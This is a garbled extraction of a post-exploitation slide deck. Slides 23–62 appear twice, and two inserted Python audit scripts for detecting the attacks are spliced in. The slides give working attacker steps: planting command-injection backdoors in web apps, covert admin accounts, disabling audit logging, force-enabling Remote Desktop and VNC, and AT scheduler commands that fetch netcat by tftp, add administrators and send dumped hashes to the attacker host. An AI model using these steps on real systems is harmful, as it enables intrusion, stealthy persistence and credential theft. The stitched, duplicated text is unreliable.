Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
      – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
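The two files above, together with the vnc.reg from slide 51, are the artifacts this procedure leaves on disk and in the registry, so they are also what a defender can audit for. The following Python is an added example, not code from the talk or from Offensive Computing: it parses a secedit template in the fix_ts_policy.ini format and a Registry Editor 5.00 export in the enable_ts.reg / vnc.reg format (both embedded here as constructed copies of the slides' files) and reports the specific weakenings: Remote Desktop forced on, the SeDeny*LogonRight entries emptied, interactive or remote interactive logon granted to a principal outside an expected list, and a WinVNC3 Password value installed. The `expected_rdp_principals` default, the finding wording and the function names are my own.

```python
"""Added example (not from the talk): audit the artifacts that the
slide 53/54 procedure (and the slide 51 vnc.reg) leave behind."""
import configparser
import re

# Constructed inputs modelled on the files shown in the slides (the
# hacked_account name and the VNC password bytes are the slides' own).
FIX_TS_POLICY_INI = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
VNC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default"
DENY_RIGHTS = ("sedenyinteractivelogonright",
               "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")
GRANT_RIGHTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
REG_VALUE_RE = re.compile(
    r'^"(?P<name>[^"]+)"=(?P<type>dword|hex):(?P<data>[0-9a-fA-F,]+)$')


def parse_reg(text):
    """Minimal .reg parser: {key_path: {value_name: (type, data)}}.
    Only dword and hex values are handled; that is all these files use."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = REG_VALUE_RE.match(line)
        if m and current is not None:
            data = m.group("data")
            if m.group("type") == "dword":
                keys[current][m.group("name")] = ("dword", int(data, 16))
            else:
                keys[current][m.group("name")] = ("hex", bytes.fromhex(data.replace(",", "")))
    return keys


def parse_secedit_inf(text):
    """secedit templates are INI files; interpolation is off so the
    $CHICAGO$ signature is not treated specially."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def audit(reg_text, inf_text, expected_rdp_principals=("administrators",)):
    """Return a list of human-readable findings; an empty list is clean."""
    findings = []
    reg = parse_reg(reg_text)
    ts = reg.get(TS_KEY, {})
    if ts.get("fDenyTSConnections", ("dword", 1))[1] == 0:
        findings.append("fDenyTSConnections=0: Remote Desktop connections allowed")
    if ts.get("TSEnabled", ("dword", 0))[1] == 1:
        findings.append("TSEnabled=1: Terminal Services enabled")
    if "Password" in reg.get(VNC_KEY, {}):
        findings.append("WinVNC3 Password value present: a VNC server has been configured")
    inf = parse_secedit_inf(inf_text)
    if inf.has_section("Privilege Rights"):
        rights = inf["Privilege Rights"]
        for right in DENY_RIGHTS:            # an emptied deny right lifts a restriction
            if right in rights and rights[right].strip() == "":
                findings.append(f"{right} cleared: deny-logon restriction removed")
        for right in GRANT_RIGHTS:           # who was handed console/RDP logon
            for principal in rights.get(right, "").split(","):
                p = principal.strip()
                if p and p.lower() not in expected_rdp_principals:
                    findings.append(f"{right} granted to unexpected principal '{p}'")
    return findings


def audit_slide_files():
    """Run the audit over the constructed copies of the slides' files."""
    return audit(REG_EXPORT, FIX_TS_POLICY_INI)


if __name__ == "__main__":
    for finding in audit_slide_files():
        print(finding)
```

Feed it a `secedit /export /cfg` dump and a `reg export` of the two keys from a host under review; comparing the findings against a known-good baseline matters more than the raw list, since some environments legitimately enable Remote Desktop and the interesting signal is the change.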

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems

• Remember, this is POST exploitation, so you already have some access

• The AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry, policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT
  – Flow:
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes identified by IP back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
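The flow on slides 58 to 61 leaves a visible trace: until the job fires, `at \\target` (or `at` run locally) lists it, with a "Today" day, a time a minute or two ahead, and a command line that pulls a file with tftp or runs a dropped batch file. The following Python is an added example, not code from the talk; it parses a constructed listing in the XP/2003 `at` output format and flags jobs on those two signals. The listing text, the 10.0.0.5 address, the listing time, the pattern labels and the 5-minute window are all constructed for the example.

```python
"""Added example (not from the talk): hunt for the slide 58-61 AT pattern
in the job list that `at` prints."""
import re
from datetime import datetime, timedelta

# Constructed listing mimicking the XP/2003 `at` output; the job
# commands are the ones the slides describe. LISTING_TIME is the
# (constructed) moment the listing was taken.
AT_LISTING = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:01 PM      tftp -i 10.0.0.5 GET e.bat
        2   Today                   12:02 PM      e.bat
        3   Each M T W Th F         6:00 PM       c:\\scripts\\backup.cmd
"""
LISTING_TIME = datetime(2008, 3, 15, 12, 0)

JOB_RE = re.compile(
    r"^\s*(?:(?P<status>ERROR)\s+)?(?P<id>\d+)\s+(?P<day>.+?)\s{2,}"
    r"(?P<time>\d{1,2}:\d{2} [AP]M)\s+(?P<cmd>.+?)\s*$")

# Command-line patterns drawn from what the slides say the AT jobs and
# e.bat do; extend with local knowledge of what is normal on the host.
PATTERNS = (
    (re.compile(r"\btftp\b.*\b(get|put)\b", re.I), "tftp file transfer"),
    (re.compile(r"\bnet\s+user\b.*/add", re.I), "local account creation"),
    (re.compile(r"\bnet\s+localgroup\b.*/add", re.I), "group membership change"),
    (re.compile(r"\b(nc|netcat)(\.exe)?\b", re.I), "netcat"),
)
ONE_SHOT_WINDOW = timedelta(minutes=5)


def parse_at_listing(text):
    """Turn the `at` table into a list of job dicts; header and rule lines
    do not match JOB_RE and are skipped."""
    jobs = []
    for line in text.splitlines():
        m = JOB_RE.match(line)
        if m:
            jobs.append({"id": int(m.group("id")), "status": m.group("status") or "",
                         "day": m.group("day"), "time": m.group("time"),
                         "cmd": m.group("cmd")})
    return jobs


def find_suspicious(text, listing_time):
    """Return [(job_id, [reason, ...])] for jobs worth a closer look."""
    hits = []
    for job in parse_at_listing(text):
        reasons = [label for pat, label in PATTERNS if pat.search(job["cmd"])]
        if job["day"] == "Today":
            # The AT-as-a-shell flow schedules work one or two minutes out,
            # so a one-shot job due almost immediately is the second signal.
            t = datetime.strptime(job["time"], "%I:%M %p")
            due = listing_time.replace(hour=t.hour, minute=t.minute, second=0, microsecond=0)
            delta = due - listing_time
            if timedelta(0) <= delta <= ONE_SHOT_WINDOW:
                reasons.append(f"one-shot job due {int(delta.total_seconds() // 60)} min after listing")
        if reasons:
            hits.append((job["id"], reasons))
    return hits


def audit_sample():
    """Run the hunt over the constructed listing."""
    return find_suspicious(AT_LISTING, LISTING_TIME)


if __name__ == "__main__":
    for job_id, reasons in audit_sample():
        print(f"job {job_id}: {'; '.join(reasons)}")
```

Because an `at` job is removed once it has run, this only catches the window between scheduling and execution; for after-the-fact review, the Task Scheduler's own log (SchedLgU.txt on XP/2003) and the Security event log are the places to look, and the slide 62 note that jobs default to SYSTEM is the reason the resulting account and group changes deserve attention.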

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use, re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session credentials on a range of hosts

• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

Page 3: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 3

Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

